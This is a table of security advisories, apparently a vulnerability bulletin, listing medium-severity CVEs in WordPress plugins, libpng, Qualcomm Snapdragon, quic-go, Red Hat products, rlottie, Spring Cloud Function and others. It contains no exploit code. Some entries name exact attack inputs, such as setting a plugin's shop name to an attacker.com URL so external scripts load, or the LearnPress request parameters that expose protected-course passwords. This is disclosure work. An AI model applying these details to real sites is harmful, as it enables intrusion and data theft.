| passeum--Passeum Ticketing | The Passeum Ticketing plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.0. This is due to the `get_shop_url()` method returning the `shop_name` setting value without sanitization when it begins with "http", combined with insufficient validation in the `validate_shop_name()` function which only checks for empty values and string type. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary external scripts by setting the `shop_name` to an attacker-controlled URL (e.g., `https://attacker.com`), which causes the plugin to enqueue external JavaScript and CSS from the attacker-controlled domain via `wp_register_script()` and `wp_register_style()`. The injected scripts execute on every frontend page containing any Passeum Ticketing shortcode, affecting all site visitors. Please note that this does not affect single-site installations as administrators already have the `unfiltered_html` capability. | 2026-06-02 | 4.4 | CVE-2026-7421 |
| pattihis--Simple Custom Login Page | The Simple Custom Login Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the color settings fields (Page Background, Form Background, Text Color, Link Color) in versions up to and including 1.0.3. This is due to insufficient input sanitization of the color option values (they were registered with register_setting() and stored via the Settings API/update_option() with no sanitize_callback) combined with the values being output into a <style> block on wp-login.php using esc_attr(), which is incorrect for a CSS context (it does not escape ;, {, }, / or *). This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary CSS rules into the login page that are rendered for all unauthenticated visitors, enabling UI-redress and credential-phishing attacks. | 2026-06-02 | 4.4 | CVE-2026-10100 |
| payaddons--Express Payment For Stripe | The Express Payment For Stripe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' attribute of the [stripe-express] shortcode in versions up to, and including, 1.28.0. This is due to insufficient input sanitization and output escaping on the shortcode attribute value, which is concatenated into an HTML attribute in the rendered output of the register_shortcode() function without being passed through esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-05 | 6.4 | CVE-2026-8893 |
| pcis--Laiser Tag | The Laiser Tag plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.5. This is due to missing or incorrect nonce validation on the addOptionsPageFields function. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, tag blacklist, relevance threshold, batch size, and tagging toggles, via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9722 |
| planetshaker--EmergencyWP Dead Man's switch & legacy deliverance | The EmergencyWP - Dead Man's switch & legacy deliverance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.2. This is due to missing or incorrect nonce validation on the form_settings_ui (settings save handler, procedural include scope) function. This makes it possible for unauthenticated attackers to modify plugin settings including the minimum access role (altering WordPress role capabilities via add_cap/remove_cap), the data-erasure-on-uninstall flag, life-check timing values, the mandator email address, the confirmation page ID, and date/time formats via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9732 |
| pnggroup--libpng | LIBPNG is a reference library for use in applications that process PNG (Portable Network Graphics) raster image files. In version 1.8.0, three inter-frame chunk discard paths in the push-mode APNG parser clear the chunk-header flag without consuming the chunk body and CRC, allowing attacker-controlled bytes inside an ignored ancillary chunk to be reinterpreted as a fresh chunk header on the next call to `png_process_data`. Commit faf06924688b62d7c1654b5ceddedbde66ffadb4 fixes the issue. | 2026-06-04 | 5.4 | CVE-2026-40930 |
| Popup-Builder--Popup Builder | WordPress Popup Builder 3.49 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by breaking out of option tags in the post_title parameter. Attackers can submit crafted POST requests to the post.php endpoint with script payloads in the post_title field that execute when pages or posts display popup selections. | 2026-06-04 | 6.4 | CVE-2019-25744 |
| Printeers--Printeers Print & Ship | Missing Authorization vulnerability in Printeers Printeers Print & Ship allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Printeers Print & Ship: from n/a through 1.17.0. | 2026-06-02 | 6.5 | CVE-2025-52766 |
| projectworlds--Online Art Gallery Shop Project | A vulnerability was identified in projectworlds Online Art Gallery Shop Project 1.0. The affected element is an unknown function of the file /admin/adminHome.php. The manipulation of the argument social_insta leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-06-04 | 6.3 | CVE-2026-10874 |
| projectworlds--Online Art Gallery Shop Project | A security flaw has been discovered in projectworlds Online Art Gallery Shop Project 1.0. The impacted element is an unknown function of the file /admin/adminHome.ph. The manipulation of the argument social_twitter results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10875 |
| QloApps--QloApps | QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial. | 2026-06-02 | 5.9 | CVE-2026-25861 |
| qriouslad--Debug Log Manager Conveniently Monitor and Inspect Errors | The Debug Log Manager - Conveniently Monitor and Inspect Errors plugin for WordPress is vulnerable to Improper Output Neutralization for Logs in all versions up to, and including, 2.5.0. This is due to the `log_js_errors()` AJAX handler being registered for unauthenticated users via `wp_ajax_nopriv_log_js_errors` and gated only by a nonce that is publicly disclosed in every front-end page's HTML through `wp_localize_script()` whenever JavaScript error logging is enabled, providing no real authorization barrier. This makes it possible for unauthenticated attackers to inject arbitrary forged entries into the site's WordPress debug log by supplying attacker-controlled values for the `message`, `script`, `lineNo`, `columnNo`, and `pageUrl` fields - enabling spoofing of error and incident records, obscuring malicious activity within fabricated log noise, and misleading administrators who rely on the log for triage. This vulnerability is only exploitable when the plugin's JavaScript error logging feature is enabled, as the requisite nonce is only published into the page HTML under that condition. | 2026-06-06 | 5.3 | CVE-2026-9016 |
| Qualcomm, Inc.--Snapdragon | Information Disclosure when resetting device to factory default settings through powerline interface allows unauthorized access to device configuration. | 2026-06-01 | 6.5 | CVE-2025-59601 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing IOCTL requests with mismatched API versions due to concurrent modification of user-space buffer. | 2026-06-01 | 6.4 | CVE-2025-59610 |
| Qualcomm, Inc.--Snapdragon | Memory corruption in diagnostic services due to absence of input validation | 2026-06-01 | 6.7 | CVE-2025-59611 |
| Qualcomm, Inc.--Snapdragon | Memory corruption in windows drivers while sending incorrect trusted application request | 2026-06-01 | 6.7 | CVE-2025-59612 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when output buffer size is smaller than input buffer size during data copying operation. | 2026-06-01 | 6.7 | CVE-2025-59613 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when sending random number generator command with insufficient output buffer size. | 2026-06-01 | 6.7 | CVE-2025-59614 |
| Qualcomm, Inc.--Snapdragon | Information Disclosure when processing advertisement frames with malformed MBSSID elements of insufficient length. | 2026-06-01 | 5.5 | CVE-2025-59609 |
| quic-go--quic-go | quic-go is an implementation of the QUIC protocol in Go. Prior to version 0.59.1, an attacker can cause excessive memory allocation in quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large trailer field section with many unique field names and/or large values. The implementation builds an `http.Header` for the corresponding `http.Request` or `http.Response`, while only enforcing limits on the size of the QPACK-compressed HEADERS frame, not on the decoded field section. This can lead to memory exhaustion. This is very similar to CVE-2025-64702. The difference is that this issue uses HTTP trailers, rather than HTTP headers, as the attack vector. A misbehaving or malicious peer can cause a denial-of-service (DoS) attack against quic-go's HTTP/3 servers or clients by triggering excessive memory allocation, potentially leading to crashes or resource exhaustion. This affects both servers and clients due to symmetric header construction. Version 0.59.1 enforces RFC 9114 decoded field section size limits for trailers as well. It incrementally decodes QPACK entries and checks the field section size after each entry, aborting the stream if an entry causes the limit to be exceeded. | 2026-06-04 | 5.3 | CVE-2026-40898 |
| raja3c--Tiled Gallery Carousel Without JetPack | The Tiled Gallery Carousel Without JetPack plugin for WordPress is vulnerable to stored cross-site scripting via the 'data-image-title' parameter in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 5.4 | CVE-2026-5191 |
| Red Hat--Multicluster Engine for Kubernetes | A flaw was found in NetworkManager. This local privilege escalation vulnerability exists in NetworkManager's dhclient backend when processing malformed Manufacturer Usage Description (MUD) URLs. A local user can exploit this flaw to escalate privileges by triggering a script via a crafted MUD URL, provided an administrator has explicitly configured NetworkManager to use dhclient. This issue does not affect default configurations of NetworkManager. | 2026-06-04 | 6.7 | CVE-2026-10805 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds read flaw was found in the X.Org X server and Xwayland in __glXDisp_ChangeDrawableAttributes(). A wrong size validation check can read a client-controlled number of bytes, exceeding the request buffer, leading to information disclosure. A write path also exists but requires byte-swapped clients which is disabled by default. | 2026-06-05 | 5.5 | CVE-2026-50262 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in CreateSaverWindow(). A client can trigger a use-after-free read after changing window attributes and forcing the screen saver, leading to information disclosure. | 2026-06-05 | 5.5 | CVE-2026-50263 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in OpenShift Container Platform. Completed pods with restartPolicy: Never do not count toward ResourceQuota pod limits, and Kubernetes events are not quota-scoped. A non-privileged user who can create pods in a namespace can exploit this to generate a large volume of events that accumulate in etcd, causing API server performance degradation across the cluster. | 2026-06-01 | 5 | CVE-2026-10533 |
| Red Hat--Red Hat Quay 3 | A flaw was found in Clair. The fetcher component makes outbound HTTP requests to attacker-supplied URIs from manifest layer descriptors without IP or scheme filtering. When PSK authentication is not configured (opt-in, not enforced by default), an unauthenticated attacker can submit a manifest with a URI pointing to internal services or cloud metadata endpoints. The SSRF is reflective for non-200 responses, leaking up to 256 bytes of error body content via CheckResponse error messages. Operator-managed Red Hat Quay deployments auto-configure PSK and are not exposed to the unauthenticated attack vector. | 2026-06-01 | 5.8 | CVE-2026-10517 |
| remix-run--react-router | React Router is a router for React. In versions 7.5.1 through 7.13.1, when using Framework Mode with pre-rendering enabled, improper neutralization of the HTTP `Location` header value can permit Cross-Site Scripting (XSS) in the statically generated HTML files if the redirect location comes from an untrusted source. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in version 7.13.2. | 2026-06-02 | 5.4 | CVE-2026-33244 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions 7.0.0 - 7.0.14, via the 'slider.get.full' AJAX Action. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including raw social media API credentials: the Instagram OAuth token, Flickr API key, YouTube Data API key, and Facebook App ID, stored in any configured slider's settings. | 2026-06-01 | 4.3 | CVE-2026-9048 |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress in versions 6.0.0-6.7.55 and 7.0.0-7.0.14 is vulnerable to unauthorized modification of data. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with Contributor-level access and above, to deactivate any active plugin installed on the site. | 2026-06-01 | 4.3 | CVE-2026-9050 |
| russellr--Tectite Forms | The Tectite Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the admin_init function. This makes it possible for unauthenticated attackers to modify the plugin's settings, including the tectite_forms_button option, via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-02 | 4.3 | CVE-2026-9599 |
| Samsung Open Source--rlottie | Out-of-bounds read vulnerability in Samsung Open Source rlottie allows Overread Buffers. This issue affects rlottie: before 223a2a41ba4f462e4abe767bebba49a366c9b9fd. | 2026-06-04 | 6.1 | CVE-2026-10305 |
| Samsung Open Source--rlottie | Uncontrolled Recursion vulnerability in Samsung Open Source rlottie allows Oversized Serialized Data Payloads. This issue affects rlottie: before e2d19e3b150e0e4a9586fa90b56fd3061cc98945. | 2026-06-04 | 6.1 | CVE-2026-47306 |
| Samsung Open Source--rlottie | Stack-based buffer overflow vulnerability in Samsung Open Source rlottie allows Overflow Buffers. This issue affects rlottie: before ce72b35a7ad0dded03051d3aa0ef75321c3bd035. | 2026-06-04 | 6.1 | CVE-2026-47318 |
| Samsung Open Source--rlottie | Memory allocation with excessive size value vulnerability in Samsung Open Source rlottie allows Excessive Allocation. This issue affects rlottie: before 0b4e308fa88c72cbb60cc8a2c1d2c2ad89b101dd. | 2026-06-04 | 6.1 | CVE-2026-47319 |
| Samsung Open Source--rlottie | Access of uninitialized pointer, Uncontrolled Recursion vulnerability in Samsung Open Source rlottie allows Pointer Manipulation, Oversized Serialized Data Payloads. This issue affects rlottie: before eae37633fda13ac05b25c6c95aacea4bc33c80a3. | 2026-06-04 | 6.1 | CVE-2026-47320 |
| Samsung Open Source--rlottie | Integer overflow or wraparound vulnerability in Samsung Open Source rlottie allows Integer Attacks. This issue affects rlottie: before 21292665023e5074b38254432716866d00f1985f. | 2026-06-04 | 6.1 | CVE-2026-49510 |
| Samsung Open Source--rlottie | Out-of-bounds write vulnerability in Samsung Open Source rlottie allows Overflow Buffers. This issue affects rlottie: before dcfde72eae1b0464dc0dd760aec00ada6a148635. | 2026-06-04 | 6.1 | CVE-2026-8916 |
| Sekander Badsha--Crew HRM | Missing Authorization vulnerability in Sekander Badsha Crew HRM allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Crew HRM: from n/a through 1.2.2. | 2026-06-02 | 5.4 | CVE-2026-27351 |
| Siemens--RUGGEDCOM RST2428P | A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V4.0). The affected application stores sensitive information in the browser cache when an authenticated user modifies specific configurations. This could allow an authenticated attacker to access sensitive data stored in the browser. | 2026-06-02 | 5.7 | CVE-2026-41918 |
| smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations & More | The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insecure Direct Object Reference / Authorization Bypass leading to Arbitrary Attachment Deletion in versions up to, and including, 1.8.11.1 via the profile avatar update flow. This is due to the save_avatar() function in Charitable_Profile_Form calling wp_delete_attachment() on an attachment ID read from the user's 'avatar' meta without validating that the attachment is owned by the user, combined with Charitable_Data_Processor::process_picture() returning the raw posted value when no file is uploaded, allowing the 'avatar' user meta to be poisoned with any attacker-chosen attachment ID. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary attachments from the Media Library by performing a two-request chain (first poisoning the stored avatar meta value with a target attachment ID, then triggering deletion via a normal avatar upload). | 2026-06-05 | 4.3 | CVE-2026-10038 |
| smub--WPForms Easy Form Builder for WordPress Contact Forms, Payment Forms, Surveys, & More | The WPForms - Easy Form Builder for WordPress - Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to and including 1.10.0.1. This is due to the PayPal Commerce webhook endpoint processing unauthenticated JSON webhook payloads without verifying that the request originated from PayPal using the required HMAC-SHA256 webhook signature, and only checking whether the supplied event_type is whitelisted before dispatching the attacker-controlled resource data to handlers that update payment records. This makes it possible for unauthenticated attackers who know a valid PayPal subscription_id to forge PayPal webhook events and modify subscription payment records, such as reactivating a cancelled or suspended subscription by setting its subscription_status to active. | 2026-06-06 | 5.3 | CVE-2026-7792 |
| Soliloquywp--Soliloquy Lite | WordPress Soliloquy Lite 2.5.6 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting script tags in the post title field. Attackers can submit POST requests to the post editing endpoint with script payloads in the post_title parameter, which are stored and executed when users preview the post. | 2026-06-04 | 6.4 | CVE-2019-25743 |
| SourceCodester--Human Resource Management | A vulnerability has been found in SourceCodester Human Resource Management 1.0. Affected by this vulnerability is an unknown functionality of the file /detailview.php of the component Employee View Page. Such manipulation of the argument employeeid leads to improper control of resource identifiers. The attack may be performed remotely. The exploit has been disclosed to the public and may be used. | 2026-06-02 | 4.3 | CVE-2026-10624 |
| SourceCodester--Online Boat Reservation System | A security vulnerability has been detected in SourceCodester Online Boat Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the component Administrative Endpoint. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Multiple endpoints are affected. | 2026-06-03 | 6.3 | CVE-2026-10693 |
| SourceCodester--Pet Grooming Management Software | A flaw has been found in SourceCodester Pet Grooming Management Software 1.0. Affected is an unknown function of the file /admin/. This manipulation causes file and directory information exposure. The attack can be initiated remotely. The exploit has been published and may be used. | 2026-06-01 | 5.3 | CVE-2026-10254 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this vulnerability is the function sell_statement of the file application/controllers/ShowForm.php. Such manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 5.3 | CVE-2026-10255 |
| SourceCodester--Pharmacy Sales and Inventory System | A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 4.7 | CVE-2026-10248 |
| SourceCodester--Pizzafy Ecommerce System | A vulnerability was detected in SourceCodester Pizzafy Ecommerce System 1.0. Impacted is an unknown function of the file /admin/index.php. Performing a manipulation of the argument page results in file inclusion. The attack can be carried out remotely. The exploit is now public and may be used. | 2026-06-02 | 6.3 | CVE-2026-10558 |
| SourceCodester--Pizzafy Ecommerce System | A flaw has been found in SourceCodester Pizzafy Ecommerce System 1.0. The affected element is an unknown function of the file /index.php. Executing a manipulation of the argument page can lead to file inclusion. The attack may be performed remotely. The exploit has been published and may be used. | 2026-06-02 | 6.3 | CVE-2026-10559 |
| SourceCodester--Ship Ferry Ticket Reservation System | A weakness has been identified in SourceCodester Ship Ferry Ticket Reservation System 1.0. This affects an unknown function of the file /admin/. This manipulation of the argument page causes improper authorization. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-06-04 | 6.3 | CVE-2026-10876 |
| SourceCodester--Water Billing Management System | A vulnerability was found in SourceCodester Water Billing Management System 1.0. Impacted is an unknown function of the file /admin/?page=user/manage_user of the component User Management Module. Performing a manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2026-06-01 | 4.7 | CVE-2026-10237 |
| spacetime--Ad Inserter Ad Manager & AdSense Ads | The Ad Inserter - Ad Manager & AdSense Ads plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL Parameters in iframe Mode in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. Exploitation requires that iframe mode (AI_OPTION_IFRAME) is enabled on at least one ad block displayed on the targeted page, which is a non-default but supported configuration commonly used for AdSense and JavaScript-based ads. | 2026-06-06 | 6.1 | CVE-2026-9280 |
| Spring--Spring Cloud Function | Under infinite recursion in the routing layer, request handling can cause an OOM error. Affected Spring Products and Versions: Spring Cloud Function 3.2.x: versions prior to 3.2.16; Spring Cloud Function 4.1.x: versions prior to 4.1.10; Spring Cloud Function 4.2.x: versions prior to 4.2.6; Spring Cloud Function 4.3.x: versions prior to 4.3.3; Spring Cloud Function 5.0.x: versions prior to 5.0.2. Older, unsupported versions are also affected. | 2026-06-01 | 5.7 | CVE-2026-40989 |
| Spring--Spring Cloud Function | An OOM error is possible while attempting to add an unbounded number of functions to the Function Registry. Affected Spring Products and Versions: Spring Cloud Function 3.2.x: versions prior to 3.2.16; Spring Cloud Function 4.1.x: versions prior to 4.1.10; Spring Cloud Function 4.2.x: versions prior to 4.2.6; Spring Cloud Function 4.3.x: versions prior to 4.3.3; Spring Cloud Function 5.0.x: versions prior to 5.0.2. Older, unsupported versions are also affected. | 2026-06-01 | 5.7 | CVE-2026-40990 |
| spyrosvl--Simple SEO Slideshow | The Simple SEO Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. WordPress KSES does not strip malicious shortcode attribute values on post save, allowing contributor-level users to persist payloads that execute for any visitor, including administrators reviewing the post. | 2026-06-05 | 6.4 | CVE-2026-8900 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains a session cookie leakage vulnerability that allows network attackers to intercept imported browser session cookies by exploiting improper redirect handling for Amp and Ollama provider sessions. Attackers can position themselves on the network path to receive cleartext HTTP requests carrying imported session cookies when a provider-controlled redirect target issues a redirect to a cleartext HTTP endpoint within the same provider domain. | 2026-06-01 | 5.9 | CVE-2026-43625 |
| StormShield--StormShield Network Security | A vulnerability was discovered in Stormshield Network Security 4.3.0 to 4.3.41, 4.8.0 to 4.8.15, and 5.0.0 to 5.0.5. It is possible to execute a reflected XSS attack on the login API available on the Stormshield SNS appliance by executing a script on the victim's machine. The risks include the theft of cookies or other sensitive data, as well as the modification of page behavior, for example, by redirecting the victim to malicious websites. | 2026-06-01 | 5.3 | CVE-2026-8474 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.71.0 through 0.315.6, the QueryDepthLimiter extension is vulnerable to an application-level DoS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references, the determine_depth function enters an infinite recursion, leading to a RecursionError and crashing the validation process. Version 0.315.7 patches the issue. | 2026-06-04 | 5.3 | CVE-2026-47706 |
| strawberry-graphql--strawberry | Strawberry GraphQL is a library for creating GraphQL APIs. In versions 0.172.0 through 0.315.6, the MaxAliasesLimiter extension in Strawberry fails to account for the multiplicative/amplification effect of FragmentSpreadNode. While it correctly counts static aliases within the AST, it does not consider how many times a fragment's internal aliases are expanded during execution. This allows an attacker to bypass alias limits and force the server to resolve and render a significantly higher number of aliases than allowed, potentially leading to a DoS via resource exhaustion. Version 0.315.7 contains a fix for the issue. | 2026-06-04 | 5.3 | CVE-2026-47707 |
| StylemixThemes--MasterStudy LMS Pro | The MasterStudy LMS Pro Plus plugin for WordPress is vulnerable to generic SQL Injection via the 'columns' parameter in all versions up to, and including, 4.8.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with instructor-level access or above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-06-04 | 6.5 | CVE-2026-8653 |
| Synology--Hyper Backup | An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Backup.Repository webapi component in Synology Hyper Backup before 4.1.2-4036 allows remote authenticated users with administrator privileges to write specific files containing non-sensitive information via unspecified vectors. | 2026-06-03 | 4.1 | CVE-2024-47263 |
| Synology--Hyper Backup | An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in Backup Task functionality in Synology Hyper Backup before 4.1.2-4036 allows remote authenticated users to write specific files via unspecified vectors. | 2026-06-03 | 4.3 | CVE-2024-47273 |
| Synology--Synology Note Station Client | A cleartext transmission of sensitive information vulnerability in Synology Note Station Client before 2.2.4-703 allows man-in-the-middle attackers to obtain user credentials. | 2026-06-03 | 5.9 | CVE-2023-52951 |
| takien--Word Replacer | The Word Replacer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'replacement' parameter in all versions up to, and including, 0.4. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-02 | 4.4 | CVE-2026-3620 |
| themeisle--RSS Aggregator by Feedzy Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator | The RSS Aggregator by Feedzy - Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor-level access and above, to create and execute RSS import jobs, purge (force-delete) all posts associated with any import job, clear import error logs, and enumerate taxonomy terms and post meta_key names. The nonce required to reach these sub-handlers is leaked to any user with the edit_posts capability via the feedzyjs localized script injected into the block editor, meaning no privileged nonce theft or separate exploit step is required for Contributor-level users. | 2026-06-05 | 4.3 | CVE-2026-8976 |
| theonedev--onedev | A vulnerability has been found in theonedev onedev up to 15.0.5. Affected by this vulnerability is an unknown functionality of the file /projects. The manipulation of the argument project.forkedFromId leads to improper authorization. The attack is possible to be carried out remotely. Upgrading to version 15.0.6 addresses this issue. Upgrading the affected component is recommended. | 2026-06-06 | 6.3 | CVE-2026-11438 |
| theonedev--onedev | A vulnerability was found in theonedev onedev up to 15.0.5. Affected by this issue is some unknown functionality of the file /projects/ of the component Parent Project Handler. The manipulation of the argument project.parentId results in improper authorization. The attack may be performed from remote. Upgrading to version 15.0.6 can resolve this issue. It is recommended to upgrade the affected component. | 2026-06-06 | 6.3 | CVE-2026-11439 |
| theonedev--onedev | A vulnerability was determined in theonedev onedev up to 15.0.5. This affects an unknown part of the file /repositories/{projectId}/default-branch of the component REST API. This manipulation of the argument project.defaultBranch causes improper authorization. It is possible to initiate the attack remotely. Upgrading to version 15.0.6 is able to mitigate this issue. Upgrading the affected component is advised. | 2026-06-06 | 6.3 | CVE-2026-11440 |
| theonedev--onedev | A vulnerability was identified in theonedev onedev up to 15.0.5. This vulnerability affects the function canAccessIssue of the file /issues/ of the component Pull Request Handler. Such manipulation of the argument issue leads to improper authorization. It is possible to launch the attack remotely. Upgrading to version 15.0.6 is able to resolve this issue. It is advisable to upgrade the affected component. | 2026-06-06 | 6.3 | CVE-2026-11441 |
| thimpress--LearnPress Backup & Migration Tool | The LearnPress - Backup & Migration Tool plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.1.4 via deserialization of untrusted input. This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like deleting arbitrary files, retrieving sensitive data, or executing code, depending on the POP chain present. | 2026-06-06 | 6.6 | CVE-2026-7566 |
| thimpress--LearnPress Backup & Migration Tool | The LearnPress - Backup & Migration Tool plugin for WordPress is vulnerable to Arbitrary File Read via Directory Traversal in all versions up to, and including, 4.1.4 via the 'import-user-file' parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-06-06 | 4.9 | CVE-2026-7565 |
| thimpress--LearnPress WordPress LMS Plugin for Create and Sell Online Courses | The LearnPress - WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.6 via the 'return_type' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including the plaintext post_password of password-protected courses and the full post_content, post_author, and post_name of unpublished draft, private, and pending courses via the unrestricted SELECT * fallback query. Exploitation requires supplying both c_status=all (to bypass the publish-only post_status WHERE clause) and return_type=json (to prevent the safe DISTINCT(ID) AS ID field override) in a single unauthenticated request to the /wp-json/lp/v1/courses/archive-course endpoint. | 2026-06-06 | 5.3 | CVE-2026-8502 |
| ThimPress--Thim Core | Missing Authorization vulnerability in ThimPress Thim Core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thim Core: from n/a through 2.3.3. | 2026-06-02 | 4.3 | CVE-2025-53346 |
| thorvg--thorvg | Thor Vector Graphics (ThorVG) is a production-ready vector graphics engine. Prior to version 1.0.5, a null pointer dereference in SvgLoader::run() allows any caller that passes untrusted SVG data to Picture::load() to crash the process with a 6-byte payload. This issue has been patched in version 1.0.5. | 2026-06-01 | 4.3 | CVE-2026-45729 |
| Tiobon--Employee Self-Service System | A vulnerability was found in Tiobon Employee Self-Service System up to 7.2. Affected by this vulnerability is an unknown functionality of the file /Blog/BlogSearch.aspx of the component Login Endpoint. The manipulation of the argument Keyword results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-07 | 6.3 | CVE-2026-11453 |
| Tips and Tricks HQ--WP eMember | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Tips and Tricks HQ WP eMember allows Retrieve Embedded Sensitive Data. This issue affects WP eMember: from n/a through v10.2.2. | 2026-06-04 | 5.3 | CVE-2026-49077 |
| tittuvarghese--CollegeManagementSystem | A security vulnerability has been detected in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. The impacted element is an unknown function of the file dashboard_page/forms/upload_student_data.php of the component Student Data Upload Endpoint. Such manipulation of the argument Student-Data-CSV leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 6.3 | CVE-2026-11333 |
